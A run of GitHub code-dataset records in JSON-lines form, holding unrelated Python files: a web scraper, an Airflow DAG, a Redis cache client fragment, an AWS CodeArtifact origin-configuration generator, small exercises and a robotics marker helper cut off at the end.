TCompactProtocol(mobj)\n # obj.read(cobj)\n # logger.debug(f'[REDIS] Get Response obj of {interfaceName}:{rid} from cache')\n # except Exception as e:\n # log.print_excp(e)\n # else:\n # obj = await f(*args, **kwargs)\n # if self.lucky() and obj is not None:\n # try:\n # redis = await self.connect(write=True)\n # # del some randomly when too many\n # total = await redis.scard(skey)\n # if total > capacity:\n # await redis.execute('spop', skey, int(total - capacity * 0.75))\n # else:\n # # save id to the redis set corresponding to interfaceName\n # mobj = TMemoryBuffer()\n # cobj = TCompactProtocol(mobj)\n # obj.write(cobj)\n # await redis.sadd(skey, mobj.getvalue())\n # logger.debug(f'[REDIS] Set Response obj of {interfaceName}:{rid} to cache')\n\n # # set ttl of skey\n # await redis.expire(skey, RELATED_CARD_TTL)\n # except Exception as e:\n # log.print_excp(e)\n\n # return obj\n\n # return g\n # return wrapper\n\n\nredis = RedisClient()\n","repo_name":"harryjack2017/bm","sub_path":"services/redis_client.py","file_name":"redis_client.py","file_ext":"py","file_size_in_byte":14894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"38950122014","text":"from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nimport re\n\nlist=[]\npage=1\nwhile page<=10:\n header={\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36\"}\n url=\"https://www.trendyol.com/kulaklik-x-c92?pi=\"+str(page)+\"\"\n\n get=requests.get(url,headers=header)\n content=get.content\n soup=BeautifulSoup(content,\"lxml\")\n\n p = soup.find_all(\"div\", attrs={\"class\": \"p-card-wrppr add-to-bs-card\"})\n\n for link in p:\n domain = \"https://www.trendyol.com\"\n links = domain + link.a.get(\"href\")\n product_name = link.find(\"div\", attrs={\"class\": \"prdct-desc-cntnr\"}).text.strip()\n price = link.find(\"div\", attrs={\"class\": \"pr-bx-nm with-org-prc\"}).text.strip()\n free_shipping = str(link.find(\"div\", attrs={\"class\": \"stmp fc\"}))\n free_shipping=re.sub(\"<.*?>\",\"\",free_shipping).replace(\"KARGO BEDAVA\",\"var\").replace(\"None\",\"yok\")\n fast_delivery=str(link.find(\"div\", attrs={\"class\": \"stmp rd\"}))\n fast_delivery = re.sub(\"<.*?>\", \"\", fast_delivery).replace(\"HIZLI TESLİMAT\",\"var\").replace(\"None\",\"yok\")\n review_count = str(link.find(\"span\", attrs={\"class\": \"ratingCount\"}))\n review_count=re.sub(\"<.*?>\", \"\", review_count).strip(\"()\")\n\n\n\n list.append([product_name,links,price,free_shipping,fast_delivery,review_count])\n page = page + 1\n\ndf = pd.DataFrame(list)\ndf.columns = [\"product_name\",\"links\",\"price\",\"free_shipping\",\"fast_delivery\",\"review_count\"]\ndf.to_csv(\"data\\trendyol.csv\")","repo_name":"EmirErdem/scrap_ecommerce","sub_path":"scrap_ecommerce/trendyol.py","file_name":"trendyol.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"30126755234","text":"from datetime import datetime\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom utils.helpers import sleeper\n\nnow = datetime.now()\n\ndefault_args = {\n 'start_date': datetime(now.year, now.month, now.day),\n}\n\nwith DAG('dummy_dag', default_args=default_args, schedule_interval='@daily') as dag:\n # DummyOperator represents a task with no actual functionality\n task1 = DummyOperator(task_id='task1')\n task2 = DummyOperator(task_id='task2')\n task3 = DummyOperator(task_id='task3')\n\n sleeper_task1 = PythonOperator(\n task_id='sleeper_task1',\n python_callable=sleeper,\n op_kwargs={'sec': 10},\n )\n\n sleeper_task2 = PythonOperator(\n task_id='sleeper_task2',\n python_callable=sleeper,\n op_kwargs={'sec': 5},\n )\n\n task1 >> sleeper_task1 >> task2 >> sleeper_task2 >> task3\n","repo_name":"dendihandian/minimal-airflow-docker","sub_path":"docker/airflow/dags/prod/dummy_dag.py","file_name":"dummy_dag.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"14092149339","text":"\"\"\"\nauthor: Jet Chien\nGitHub: https://github.com/jet-c-21\nCreate Date: 11/19/21\n\"\"\"\n# coding: utf-8\nimport time\n\nimport PIL\nimport numpy as np\nfrom cv2 import cv2\nfrom rembg.bg import get_model, naive_cutout\nfrom rembg.u2net.detect import predict\n\n\ndef pil_image_to_np_ndarray(image: PIL.Image.Image) -> np.ndarray:\n return cv2.cvtColor(np.asarray(image), cv2.COLOR_RGB2BGR)\n\n\ndef np_ndarray_to_pil_image(image: np.ndarray) -> PIL.Image.Image:\n return PIL.Image.fromarray(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n\n\ndef show_img(image: np.ndarray):\n cv2.imshow('', image)\n cv2.waitKey(0)\n\n\ndef remove_bg(model, image: np.ndarray) -> np.ndarray:\n # image = np_ndarray_to_pil_image(image)\n mask = predict(model, image).convert(\"L\")\n # mask.show()\n\n image = np_ndarray_to_pil_image(image)\n cutout = naive_cutout(image, mask)\n print(f\"cutout type = {type(cutout)}\")\n\n return pil_image_to_np_ndarray(cutout)\n\n\nIMG_PATH = 'peace_0.jpg'\n\nif __name__ == '__main__':\n img = cv2.imread(IMG_PATH)\n # show_img(img)\n\n u2net_model = get_model('u2net')\n\n s = time.time()\n res = remove_bg(u2net_model, img)\n e = time.time()\n\n print(e - s)\n\n show_img(res)\n","repo_name":"juancvargas/ASL_Translator","sub_path":"Archive/hand_playground/remove_background/background_remove_test.py","file_name":"background_remove_test.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"72902042014","text":"__author__ = \"Davide Semenzin (davidesn@amazon.com)\"\n__version__ = \"1.0.0\"\n\nimport csv\nimport os\nimport sys\nimport argparse\nfrom collections import defaultdict\nfrom toolkit.codeartifact_client import CodeArtifactClient\nfrom toolkit.utils import PACKAGE_TYPES, CSV_HEADER, parse_poc_flags\n\nDEFAULT_RESTRICTIONS = {'upstream': 'ALLOW', 'publish': 'ALLOW'}\nRESTRICTIONS_WITH_UPSTREAM_VERSIONS_BLOCKED = {'upstream': 'BLOCK', 'publish': 'ALLOW'}\n\n\ndef generate_package_configuration_entries(args, packages, origin_configuration):\n \"\"\"\n This generator function takes in a list of packages and an origin configuration pattern, and returns a fully-formed\n package record by interpolating with args parameters.\n \"\"\"\n for package in packages:\n line = {\n 'domain': args.domain,\n 'repository': args.repository,\n 'namespace': args.namespace if args.namespace else '',\n 'format': package['format'],\n 'package': package['package'],\n 'upstream': origin_configuration['upstream'],\n 'publish': origin_configuration['publish']\n }\n yield line\n\n\ndef block_where_possible(packages_map, current_repo_ecs):\n \"\"\"\n Decides whether or not acquiring new versions from upstreams can be safely restricted for each provided package\n in the target repository.\n We block acquisition of new versions from upstreams if and only if the target repository doesn't have direct access\n to an external connection, i.e., a public repository AND no versions of the package are available via any of\n the upstreams, either because the target repository doesn't have any upstreams or because none of the upstreams\n have the package. Falls back to allowing acquisition of new versions from the upstream by default.\n \"\"\"\n packages_with_no_restrictions = []\n packages_with_upstream_versions_restricted = []\n\n for package_coordinate, upstreams in packages_map.items():\n package_format, package_namespace, package_name = package_coordinate\n package_entry = {'repository': args.repository,\n 'format': package_format,\n 'package': package_name,\n 'namespace': package_namespace}\n\n # First verify whether there is an immediate EC available for this package type in the current repository\n if next((external_connection for external_connection in current_repo_ecs\n if external_connection.get('packageFormat') == package_format), False):\n packages_with_no_restrictions.append(package_entry)\n continue\n\n # If no EC, then let's look at upstreams: if the package is present in any of the upstreams, then we can't block\n if len(upstreams) != 0:\n packages_with_no_restrictions.append(package_entry)\n continue\n\n # Otherwise, we can BLOCK\n packages_with_upstream_versions_restricted.append(package_entry)\n return packages_with_no_restrictions, packages_with_upstream_versions_restricted\n\n\ndef get_candidate_package_list(codeartifact_client):\n \"\"\"\n This function produces a suitable packages list (in the form {'name': package name, 'format': package format})\n from either the locally-supplied list or from a query against a repository.\n \"\"\"\n if args.from_list:\n packages_from_list = []\n with open(args.from_list, \"r\") as input_file:\n reader = csv.reader(input_file)\n for package in reader:\n packages_from_list.append({'format': args.format, 'package': package[0]})\n return packages_from_list\n else:\n return codeartifact_client.list_packages_in_repository(repository=args.repository,\n package_format=args.format,\n package_namespace=args.namespace,\n package_prefix=args.prefix)\n\n\ndef collect_repository_and_package_information(codeartifact_client):\n \"\"\"\n This function gathers information about the current repository's package list, External Connections (ECs)\n and upstreams. If upstreams are present, it checks and records whether any target packages are present.\n \"\"\"\n package_to_repositories_with_package_map = defaultdict(list)\n current_repo_upstream, current_repo_ecs = codeartifact_client\\\n .get_repo_upstreams_and_external_connections(args.repository)\n upstream_graph = [] if current_repo_upstream is None else codeartifact_client.get_upstream_graph(args.repository)\n candidate_packages = get_candidate_package_list(codeartifact_client)\n\n for upstream in upstream_graph:\n packages_list = codeartifact_client.list_packages_in_repository(repository=upstream,\n package_format=args.format,\n package_namespace=args.namespace,\n package_prefix=args.prefix)\n for package in packages_list:\n if package in candidate_packages:\n package_to_repositories_with_package_map[\n (package['format'], package.get('namespace'), package['package'])\n ].append(upstream)\n\n return package_to_repositories_with_package_map, current_repo_ecs\n\n\ndef generate_default_package_configuration_entries(codeartifact_client):\n \"\"\"\n This function implements \"automatic mode\" and is responsible for orchestrating the process of deciding\n what packages we can block the upstream configuration for, and for writing the result to the output file.\n \"\"\"\n packages_map, current_repo_ecs = collect_repository_and_package_information(codeartifact_client)\n packages_with_no_restrictions, packages_with_upstream_versions_restricted = \\\n block_where_possible(packages_map, current_repo_ecs)\n with open(args.output_file, 'w+') as output_file:\n writer = csv.DictWriter(output_file, fieldnames=CSV_HEADER)\n writer.writeheader()\n for line in generate_package_configuration_entries(args, packages_with_no_restrictions,\n DEFAULT_RESTRICTIONS):\n writer.writerow(line)\n for line in generate_package_configuration_entries(args, packages_with_upstream_versions_restricted,\n RESTRICTIONS_WITH_UPSTREAM_VERSIONS_BLOCKED):\n writer.writerow(line)\n\n\ndef write_from_query(codeartifact_client):\n \"\"\"\n This function implements \"manual mode\", where a set of query parameters for ListPackages has been\n supplied, as well as an explicit origin configuration to be applied to all of them. Here we simply\n execute the query and then write the desired origin configuration in the output file.\n \"\"\"\n packages_list = codeartifact_client.list_packages_in_repository(repository=args.repository,\n package_format=args.format,\n package_namespace=args.namespace,\n package_prefix=args.prefix)\n iterator = generate_package_configuration_entries(args, packages_list, parse_poc_flags(args.configuration))\n with open(args.output_file, \"w+\") as output_file:\n writer = csv.DictWriter(output_file, fieldnames=CSV_HEADER)\n writer.writeheader()\n for entry in iterator:\n writer.writerow(entry)\n\n\ndef generate_from_provided_list():\n \"\"\"\n This function simply reads the user-supplied list and simply transforms it into a well-formed CSV\n without making any calls to AWS CodeArtifact, nor performing any verification. It expects the input\n to be well-formed as well.\n \"\"\"\n origin_configuration = parse_poc_flags(args.configuration)\n with open(args.from_list, \"r\") as input_file:\n reader = csv.reader(input_file)\n with open(args.output_file, \"w+\") as output_file:\n writer = csv.DictWriter(output_file, fieldnames=CSV_HEADER)\n writer.writeheader()\n for package in reader:\n package_entry = {\n 'domain': args.domain,\n 'repository': args.repository,\n 'namespace': args.namespace if args.namespace else '',\n 'package': package[0],\n 'format': args.format,\n 'upstream': origin_configuration['upstream'],\n 'publish': origin_configuration['publish']\n }\n writer.writerow(package_entry)\n\n\ndef main():\n \"\"\"\n Main entry point. This function routes execution towards the appropriate sub-functions depending\n on the supplied arguments combination.\n \"\"\"\n # The only mode that doesn't invoke the CA API is operating from a user-provided list\n # where origin configuration is also provided per-package.\n if args.from_list and args.configuration:\n return generate_from_provided_list()\n\n codeartifact_client = CodeArtifactClient(profile=args.profile if args.profile else os.environ.get('AWS_PROFILE'),\n region_name=args.region,\n codeartifact_domain=args.domain)\n\n if args.configuration:\n # Manual mode: this code path just applies the same configuration to all packages matching the query parameters\n write_from_query(codeartifact_client)\n else:\n # Auto mode: this code path tries to resolve where it's possible to block upstreams\n generate_default_package_configuration_entries(codeartifact_client)\n\n\ndef get_parser():\n command_description = \"This command generates a list (file?) of package configurations containing \" \\\n \"the restrictions on origin of new versions for packages in the provided repository. \" \\\n \"We use a default heuristic that only blocks acquisition of new versions \" \\\n \"from upstreams if no versions of the package are available via any of your \" \\\n \"upstreams and otherwise allows both publishing new versions of the package \" \\\n \"into the repository and acquiring new versions of the package from upstreams. \" \\\n \"If you wish to supply your own origin restrictions instead, please use the \" \\\n \"--set-restrictions option. Please see usage examples further below. \" \\\n \"By default, all packages in the repository will be considered, but you may use \" \\\n \"the various filtering arguments to scope down to packages of a specific format, \" \\\n \"under a specific namespace or following a specific prefix. \" \\\n \"You can combine the various filtering options, but note that the format \" \\\n \"is required in order to use the namespace filtering option\"\n parser = argparse.ArgumentParser(description=command_description)\n parser.add_argument(\"--profile\", help=\"AWS profile to be used (if environment variable not set).\")\n parser.add_argument('--domain', required=True, help=\"CodeArtifact domain\")\n parser.add_argument('--repository', required=True, help=\"Repository name\")\n parser.add_argument('--region', required=True, help=\"AWS region\")\n parser.add_argument('--namespace', help='Package namespace')\n parser.add_argument('--format', choices=PACKAGE_TYPES, help='Package format')\n parser.add_argument('--prefix', help='Package name search prefix')\n parser.add_argument('--set-restrictions', dest='configuration', help='A string describing the origin configuration.'\n 'It should be supplied in the follwing form:'\n '\\\"publish=[BLOCK|ALLOW],'\n 'upstream=[BLOCK|ALLOW]\\\". For example, to '\n 'block all upstream for a package in a '\n 'repository, you would assert '\n '\\\"publish=ALLOW,upstream=BLOCK\\\". See the '\n 'CodeArtifact documentation for more info.')\n parser.add_argument('--from-list', help='Name of a file containing a list of packages. If this parameter is '\n 'supplied the script creates a well-formed CSV file. This option '\n 'requires \\\"--set-restrictions\\\"')\n parser.add_argument('--output-file', help='The file name to output to. If not supplied, it defaults to '\n '\\\"origin_configuration_[domain]_[repository].csv\\\"')\n return parser\n\n\ndef parse_args(input_args):\n \"\"\"\n Additional argument processing outside of argparse scope\n \"\"\"\n parser = get_parser()\n parsed_args = parser.parse_args(input_args)\n if not parsed_args.output_file:\n parsed_args.output_file = f'origin_configuration_{parsed_args.domain}_{parsed_args.repository}.csv'\n print(f\"Result is going to be written to {parsed_args.output_file}\")\n if parsed_args.from_list and parsed_args.format is None:\n parser.error(\"List-only requires package format\")\n if parsed_args.namespace is not None and parsed_args.format is None:\n parser.error(\"Namespace requires package format\")\n return parsed_args\n\n\nif __name__ == \"__main__\":\n args = parse_args(sys.argv[1:])\n main()\n","repo_name":"aws/codeartifact-origin-control-toolkit","sub_path":"generate_package_configurations.py","file_name":"generate_package_configurations.py","file_ext":"py","file_size_in_byte":14087,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"33"} +{"seq_id":"8145441657","text":"from PyQt5.QtWidgets import QWidget, QLabel\nfrom Checkbox import Checkbox\nfrom Textbox import Textbox\nfrom StartButton import StartButton\nfrom PreprocessingManager import PreprocessingManager\n\nclass Window(QWidget):\n def __init__(self):\n super().__init__()\n self.checkbox = Checkbox(self)\n self.textbox_directory = Textbox(self,(210, 10))\n self.textbox_filename = Textbox(self, (210, 60))\n self.start_button = StartButton(self)\n self.preprocessing_manager = PreprocessingManager(self)\n self.label_dir = QLabel(parent=self, text=\"Folder name (empty for current)\")\n self.label_dir.move(10, 20)\n self.label_dir = QLabel(parent=self, text=\"File name (empty for all files)\")\n self.label_dir.move(10, 70)","repo_name":"Romanovg185/info-vis-MutS","sub_path":"Preprocessing/Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"42953199778","text":"from flask import g\nfrom flask_restful import Resource, reqparse, abort, fields, marshal\n\nfrom App.apis.apis_constant import HTTP_CREATE_OK, HTTP_OK\nfrom App.apis.cinema.cinema_user_utils import require_permission, login_require\nfrom App.models.cinema.cinema_address_model import CinemaAddress\nfrom App.models.cinema.cinema_hall_model import Hall\nfrom App.models.cinema.cinema_user_constant import PERMISSION_WRITE\nfrom App.models.cinema.cinema_user_model import CinemaUser\n\nparse = reqparse.RequestParser()\nparse.add_argument('h_num',required=True,help='请提供放映厅编号')\nparse.add_argument('h_seats',required=True,help='请提供��位数')\nparse.add_argument('h_address_id',required=True,type=int,help='请提供电影院地址')\n\nhall_fields = {\n 'h_address_id':fields.Integer,\n 'h_num':fields.Integer,\n 'h_seats':fields.String\n}\n\nmulti_hall_fields= {\n 'halls':fields.List(fields.Nested(hall_fields))\n}\n\nclass CinemaHallsResource(Resource):\n @require_permission(PERMISSION_WRITE)\n def post(self):\n user_id = g.user.id\n args = parse.parse_args()\n h_num = args.get('h_num')\n h_seats = args.get('h_seats')\n h_address_id = args.get('h_address_id')\n cinema_address = CinemaAddress.query.filter(CinemaAddress.c_user_id==user_id).filter(CinemaAddress.id==h_address_id).first()\n if not cinema_address:\n abort(400,msg='该影院不存在')\n hall = Hall()\n hall.h_num = h_num\n hall.h_address_id = h_address_id\n hall.h_seats = h_seats\n if not hall.save():\n abort(400,msg='放映厅创建失败')\n cinema_address.hallnum += 1\n if not cinema_address.save():\n abort(400,msg='同步影院信息失败')\n data = {\n 'status':HTTP_CREATE_OK,\n 'msg':'放映厅创建成功',\n 'data':marshal(hall,hall_fields)\n }\n return data\n\n def get(self):\n pass","repo_name":"ruoxianss/Flask-Tpp","sub_path":"App/apis/cinema/cinema_hall_api.py","file_name":"cinema_hall_api.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"761268010","text":"#!/bin/python3\n\n# https://www.hackerrank.com/challenges/cut-the-tree\n\nimport sys\nfrom collections import Counter\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.adjacent = [] \n def add_adjacent(self, adj):\n self.adjacent.append(adj)\n \nclass Tree:\n def __init__(self, root):\n self.root = root\n \nclass DFSNode:\n def __init__(self, value):\n self.value = value\n self.adjacent = [] \n self.visited = False\n def add_adjacent(self, adj):\n self.adjacent.append(adj)\n def visit(self):\n self.visited = True\n \nclass DFSTree:\n def __init__(self, root):\n self.root = root\n self.sum = 0\n def add(self,value):\n self.sum = self.sum + value\n\n# number of nodes\nN = int(input().strip())\n\n# initialize lists of nodes and edges\nnodes = list()\nedges = list()\n\n# populate nodes \nvals = [int(q_temp) for q_temp in input().strip().split(' ')]\nfor i in range(0,N):\n nodes.append(Node(vals[i]))\n\n# record edges between nodes\nfor i in range(0,N-1):\n e = [int(q_temp) for q_temp in input().strip().split(' ')]\n node1 = nodes[e[0]-1]\n node2 = nodes[e[1]-1]\n node1.add_adjacent(node2)\n node2.add_adjacent(node1)\n edges.append(e)\n \n\ndef buildDFSTree(vals,edges):\n nodes = list()\n # populate nodes \n for i in range(0,N):\n nodes.append(DFSNode(vals[i]))\n print(vals[i])\n # record edges between nodes\n for i in range(0,N-1):\n e = edges[i]\n node1 = nodes[e[0]-1]\n node2 = nodes[e[1]-1]\n node1.add_adjacent(node2)\n node2.add_adjacent(node1)\n tree = DFSTree(nodes[0])\n return(tree)\n \n\ndef tree_sums(root, current_sum):\n current_sum += root.value\n root.visited = True\n if len(root.adjacent) == 0:\n return(current_sum)\n subtree_sums = 0\n all_adj_visited = True\n for i in range(len(root.adjacent)):\n if root.adjacent[i].visited == False:\n all_adj_visited = False\n subtree_sums += tree_sums(root.adjacent[i], 0)\n if all_adj_visited:\n return(current_sum)\n else:\n return(current_sum+subtree_sums)\n \n# consider graph abstraction with unordered edges\n\n# do not necessarily need parent/child abstraction\n\n# remove an edge\n\ndef buildDFSNodes(vals,edges):\n nodes = list()\n # populate nodes \n for i in range(len(vals)):\n nodes.append(DFSNode(vals[i]))\n # record edges between nodes\n for i in range(len(edges)):\n e = edges[i]\n node1 = nodes[e[0]-1]\n node2 = nodes[e[1]-1]\n node1.add_adjacent(node2)\n node2.add_adjacent(node1)\n return(nodes)\n \ndef find_min_cut(vals,edges):\n min_cut = 10**100\n for i in range(0,len(edges)):\n # copy edges\n thisedges = edges.copy()\n # get indices for starting two graphs\n ind1 = thisedges[i][0]-1\n ind2 = thisedges[i][1]-1\n # remove edge of interest\n thisedges.remove(thisedges[i])\n # build graph\n nodesx = buildDFSNodes(vals,thisedges)\n # get difference in graph sums\n sum1 = tree_sums(nodesx[ind1],0)\n sum2 = tree_sums(nodesx[ind2],0)\n cut = abs(sum1-sum2)\n if cut < min_cut:\n min_cut = cut\n return(min_cut)\n \nmin_cut = find_min_cut(vals,edges)\nprint(min_cut)\n \n\n\n\n\n\n\n\n","repo_name":"ryandavis3/hackerrank","sub_path":"misc/cut_the_tree.py","file_name":"cut_the_tree.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"473962565","text":"from copy import copy\nfrom typing import Any, Optional, Union\n\nfrom ..client import Client\nfrom ..http import WebHttpClient\nfrom .models import Auth, BaseEvent, Message\n\nclass Event(BaseEvent):\n def __init__(self, auth: Auth, data) -> None:\n super().__init__(**data, **data[\"chatMessage\"])\n \n self.client: Client = Client(self.ndcId, check_updates=False)\n self.client.auth = auth\n self.client.ndc_id = self.ndcId\n \n self.client.ndc_id = self.ndcId\n \n self.web: WebHttpClient = self.client.web\n \n client: Optional[Any] = None\n web: Optional[Any] = None\n \n async def send_message(\n self, \n message: str = None,\n mentions: list = None, \n reply_to_id: str = None,\n type: int = 0\n ) -> Message:\n return await self.client.send_message(\n self.threadId, message, type, reply_to_id, mentions)\n \n async def send_web_message(\n self, \n message: str = None,\n type: int = 0\n ):\n return await self.client.web.send_message(\n self.threadId, message, type)\n\n async def reply_message(\n self,\n message: str = None,\n mentions: list = None,\n type: int = 0,\n embed_id: str = None,\n embed_type: int = None,\n embed_link: str = None, \n embed_title: str = None, \n embed_content: str = None, \n embed_image: Union[bytes, str] = None\n ) -> Message:\n return await self.client.send_message(\n self.threadId, message, type, self.messageId, mentions,\n embed_id, embed_type, embed_link, embed_title, embed_content, embed_image)\n \n async def send_image(self, image: Union[str, bytes]):\n if isinstance(image, bytes):\n image = await self.client.upload_media(image)\n \n return await self.client.web.send_image(self.threadId, image)\n\n async def send_audio(self, audio: bytes):\n return await self.client.send_audio(self.threadId, audio)\n \n # async def send_to_user(self, message: str):\n # return await self.client.web.start_chat([self.uid or self.author.uid], message)\n \n # async def comment_user(self, comment: str):\n # return await self.client.web.comment_user(self.uid or self.author.uid, comment)\n","repo_name":"Alert-Aigul/Amino.ed","sub_path":"aminoed/helpers/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"36238623617","text":"def discover(trig, tries=1000,tolerance=0.0001):#used a similar way like given in class\n for i in range(tries):#this allows us to iterate mutiple times\n t = random.uniform(-math.pi, math.pi)#random number for t from -pi to pi\n f1 = trig[random.randrange(0, len(trig))]#gives a random trig function\n f2 = trig[random.randrange(0, len(trig))]#gives a random trig function\n if f1 != f2:#if f1 and f2 are the same we do not do anything else\n y1 = eval(f1)#we evaluate\n y2 = eval(f2)#we evaluate \n if np.abs(y1-y2)>tolerance:#if they are the same, we return\n print(f1,\" and \",f2,\" are the same\")\n return False\n return True\n\ndef subsetsum(S,last,goal):#modified given subset from class and updated last by -1\n if goal ==0:\n return True, []\n if goal<0 or last<0:\n return False, []\n res, subset = subsetsum(S,last-1,goal-S[last-1])\n if res:\n subset.append(S[last-1])\n return True, subset\n else:\n return subsetsum(S,last-1,goal)\n\ndef partition(S):\n s = 0#we partition and check if our number is even, if it is not, we cannot continue\n for i in range(len(S)):\n s += S[i]\n if s%2 == 0:\n return subsetsum(S, len(S), s/2)\n return False\n\nimport math\nfrom math import *\nfrom mpmath import *\nimport random\nimport numpy as np\ntrig = ['sin(t)','cos(t)','tan(t)','sec(t)','-sin(t)','-cos(t)','-tan(t)','sin(-t)','cos(-t)',\n 'tan(-1*t)','sin(t)/cos(t)','2*sin(t/2)*cos(t/2)','sin(t)*sin(t)','1-(cos(t)*cos(t))','1-cos(2*t)/2','1/cos(t)']\nprint(discover(trig))\nS = [2, 4, 5, 9, 12]\nprint(partition(S))\n","repo_name":"Protogey/CS2302","sub_path":"Lab8.py","file_name":"Lab8.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"28780759926","text":"# coding = utf-8\nimport time,threading\n#开启事件\nevent = threading.Event()\ncount = 0\nclass Lighter(threading.Thread):\n def run(self):\n while True:\n global count\n count += 1\n time.sleep(0.4)\n event.set()\n #设置绿灯时间为10s,红灯为10s\n if count>10 and count<=20:\n event.clear()\n print('\\033[41;1m red light ..\\033[0m')\n elif count > 20:\n count = 0\n event.set()\n print('\\033[42;1m green light ..\\033[0m')\n else:\n print('\\033[42;1m green light ..\\033[0m')\n\n\nclass Car(threading.Thread):\n def __init__(self,name):\n super(Car,self).__init__()\n self.name = name\n def run(self):\n time.sleep(0.5)\n if event.is_set():\n print('{} passed the light'.format(self.name))\n else:\n print('{} is waiting the green light'.format(self.name))\n\nl = Lighter()\nl.start()\n#启动50辆车,让他们经过红绿灯\nfor i in range(50):\n time.sleep(1)\n c = Car('car{}'.format(i))\n c.start()","repo_name":"zhangminvip/data_structure_python","sub_path":"traffic_light/traffic_light.py","file_name":"traffic_light.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"31715211072","text":"def populate_length(cur_length, pre_length, set_length):\n for p in pre_length:\n for s in set_length:\n cur_length[p+s] = cur_length.get(p+s, 0)+pre_length[p]*set_length[s]\n\ndef inverse_score(score):\n if type(score) is str:\n scores = score.split(':')\n return scores[1] + \":\" + scores[0]\n if type(score) is int:\n return 0 - score","repo_name":"patricksong1993/ACEGEN","sub_path":"utils/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"22756426824","text":"\nimport os\nimport csv\n\nfile= r\"C:\\Users\\lanis\\Documents\\Bootcamp\\Homework\\Python_Challenge\\PyBank\\Resources\\budget_data.csv\"\ncsvpath = file\nwith open(csvpath, 'r') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',')\n print(csvreader)\n header= next(csvreader)\n print(header)\n \n Prof_loss=[]\n dates=[]\n for row in csvreader:\n dates.append(row[0])\n Prof_loss.append(float(row[1]))\n print(dates)\n print(Prof_loss)\n num_months=[]\n print(len(dates))\n Net_total= sum(Prof_loss)\n print(\"$\", sum(Prof_loss))\n\n ","repo_name":"MsPoppy/Python_Challenge","sub_path":"PyBank/newtry.py","file_name":"newtry.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"2399854615","text":"\nfrom sr.robot import ( MARKER_TOP, MARKER_BOTTOM, MARKER_SIDE,\n NET_A, NET_B, NET_C )\n\nfrom vectors import cross_product, make_vector, vector_sum\n\n\ndef describe(marker):\n return \"{0} {1}\".format(marker.info.marker_type, marker.info.code)\n\n\ndef describe_all(markers):\n return ', '.join(map(describe, markers))\n\n\ndef get_zone(marker):\n \"\"\"Get the associated corner zone number for the marker.\"\"\"\n\n assert marker.info.marker_type == MARKER_SIDE, \\\n \"Only token side markers have associated corner zones\"\n\n FIRST_TOKEN_MARKER = 32\n\n # Use the fact that the markers are assigned in order to each token,\n # with the first two being top and bottom and the other four being\n # the zones (in ascending order); per the rules.\n zone = ((marker.info.code - FIRST_TOKEN_MARKER) % 6) - 2\n return zone\n\n\ndef is_left_side_token(marker):\n zone = get_zone(marker)\n net = marker.info.token_net\n return (net == NET_A and zone == 3) \\\n or (net == NET_B and zone == 3) \\\n or (net == NET_C and zone == 1)\n\ndef is_right_side_token(marker):\n zone = get_zone(marker)\n net = marker.info.token_net\n return (net == NET_A and zone == 1) \\\n or (net == NET_B and zone == 2) \\\n or (net == NET_C and zone == 2)\n\ndef is_rear_token(marker):\n zone = get_zone(marker)\n net = marker.info.token_net\n return (net == NET_A and zone == 2) \\\n or (net == NET_B and zone == 1) \\\n or (net == NET_C and zone == 3)\n\n\ndef get_direction_to_token_top(marker):\n \"\"\"Return the direction to the top of the token, according to the\n given marker, expressed as a ``WorldVector``.\"\"\"\n kind = marker.info.marker_type\n if kind == MARKER_SIDE:\n return get_direction_to_top(marker)\n\n elif kind == MARKER_TOP:\n return get_direction_out_from_face(marker)\n\n elif kind == MARKER_BOTTOM:\n return get_direction_behind_face(marker)\n\n else:\n assert False, \"Unexpected marker type: {0}.\".format(kind)\n\n\ndef get_direction_to_token_front(marker):\n \"\"\"Return the direction to the front of the token, according to the\n given marker, expressed as a ``WorldVector``.\n The front of the token is the one which holds the side marker\n associated with corner 0.\n \"\"\"\n kind = marker.info.marker_type\n if kind in (MARKER_TOP, MARKER_BOTTOM):\n return get_direction_to_top(marker)\n\n elif kind == MARKER_SIDE:\n zone = get_zone(marker)\n if zone == 0:\n return get_direction_out_from_face(marker)\n\n elif is_left_side_token(marker):\n return get_direction_to_left(marker)\n\n elif is_right_side_token(marker):\n return get_direction_to_right(marker)\n\n elif is_rear_token(marker):\n return get_direction_behind_face(marker)\n\n else:\n assert False, \"Unexpected side marker: 